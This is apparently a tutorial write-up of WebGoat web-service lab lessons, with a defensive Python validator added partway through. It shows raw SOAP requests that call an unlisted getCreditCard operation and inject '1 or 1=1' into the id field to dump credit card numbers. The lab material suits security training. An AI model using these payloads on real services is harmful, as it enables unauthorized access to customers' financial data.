WebGoat Day3 Web Services

Create a SOAP Request

http://localhost/WebGoat/services/SoapRequest
http://localhost/WebGoat/services/SoapRequest?WSDL

Next we have to send a SOAP request: click the button "Press to generate an HTTP request", intercept it with Burp, and then modify the intercepted request so that it conforms to the SOAP standard, as follows:

POST https://localhost:8443/WebGoat/services/SoapRequest HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://localhost:8443/WebGoat/attack?Screen=32&menu=1800
Cookie: JSESSIONID=B0E2BCDE68B32C2894064DF30A545EAA
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Connection: close
Content-Type: text/xml
SOAPAction:
Content-Length: 445
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<ns1:getFirstName SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:ns1="http://lessons">
<id xsi:type="xsd:int">101</id>
</ns1:getFirstName>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

WSDL Scanning

This lesson asks us to call every API operation defined in the WSDL and get a return value from each. We know that the WSDL actually defines four operations, but only three are listed in the interface; after reading the WSDL document we can change the request to the operation we need. As shown in the figure, change the request parameter to field=getCreditCard.

Web Service SQL Injection

We are asked to examine the WSDL file and try to obtain the credit card numbers of several customers.
As in the first section, we have to construct a SOAP request ourselves; construct and send the following request:

POST http://127.0.0.1:8080/WebGoat/services/WsSqlInjection HTTP/1.0
Accept: application/soap+xml, application/dime, multipart/related, text/*
Host: 127.0.0.1:8080
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Content-length: 584
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
<?xml version='1.0' encoding='UTF-8'?>
<wsns0:Envelope
xmlns:wsns1='http://www.w3.org/2001/XMLSchema-instance'
xmlns:xsd='http://www.w3.org/2001/XMLSchema'
xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'
>
<wsns0:Body
wsns0:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/'
>
<wsns2:getCreditCard
xmlns:wsns2='http://lessons.webgoat.owasp.org'
>
<id
xsi:type='xsd:string'
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
>1 or 1=1</id>
</wsns2:getCreditCard>
</wsns0:Body>
</wsns0:Envelope>

Note that the id is `1 or 1=1`.
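As an added example covering both the WSDL Scanning and the SQL injection lessons above (this is not part of the original post and not WebGoat's own code), the following Python validator shows the server-side checks that defeat both tricks: an allow-list of the operations the front end is meant to call (the list itself is an assumption), and enforcement of the xsd:int type that the WSDL declares for id. The two sample envelopes are constructed from the requests captured in this post.

```python
# Added example, not WebGoat's own code: server-side validation for the SOAP
# requests in this lesson.  It blocks operations the WSDL exposes but the UI
# never calls, and enforces xsd:int on <id> so "1 or 1=1" never reaches SQL.
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
XSI = "http://www.w3.org/2001/XMLSchema-instance"
ALLOWED_OPS = {"getFirstName", "getLastName"}   # assumed list; no getCreditCard

# Constructed samples: the lesson's getFirstName call and the injected call.
LESSON_REQUEST = """<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body><ns1:getFirstName xmlns:ns1="http://lessons">
<id xsi:type="xsd:int">101</id></ns1:getFirstName></SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""
INJECTED_REQUEST = """<?xml version='1.0' encoding='UTF-8'?>
<wsns0:Envelope xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'>
<wsns0:Body><wsns2:getCreditCard xmlns:wsns2='http://lessons.webgoat.owasp.org'>
<id xsi:type='xsd:string' xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
>1 or 1=1</id></wsns2:getCreditCard></wsns0:Body></wsns0:Envelope>"""

def validate_soap_request(body: str):
    """Return (True, {"op": name, "id": int}) or (False, reason)."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return False, f"malformed XML: {exc}"
    if root.tag != f"{{{SOAP_ENV}}}Envelope":
        return False, "not a SOAP 1.1 envelope"
    soap_body = root.find(f"{{{SOAP_ENV}}}Body")
    if soap_body is None or len(soap_body) != 1:
        return False, "Body must carry exactly one operation"
    op_el = soap_body[0]
    op = op_el.tag.rsplit("}", 1)[-1]          # local name without namespace
    if op not in ALLOWED_OPS:                  # blocks the WSDL-only operation
        return False, f"operation not permitted: {op}"
    id_el = op_el.find("id")
    if id_el is None:
        return False, "missing <id> parameter"
    # The WSDL types id as xsd:int; a request re-typing it as a string is tampered.
    declared = id_el.get(f"{{{XSI}}}type")
    if declared is not None and declared.rsplit(":", 1)[-1] != "int":
        return False, f"id must be xsd:int, got {declared}"
    text = (id_el.text or "").strip()
    if not text.isdigit():                     # rejects "1 or 1=1"
        return False, "id must be a non-negative integer"
    return True, {"op": op, "id": int(text)}
```

Parameterized SQL on the server side is still required; this validator only guarantees that the value handed to the query is an integer and that the operation is one the UI is meant to reach.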

Web Service SAX Injection

Some web front ends use Web Services in the back end, and Web Services communicate through SOAP requests. This lesson requires us to change the password of a user other than user 101.
After intercepting the request, modify it.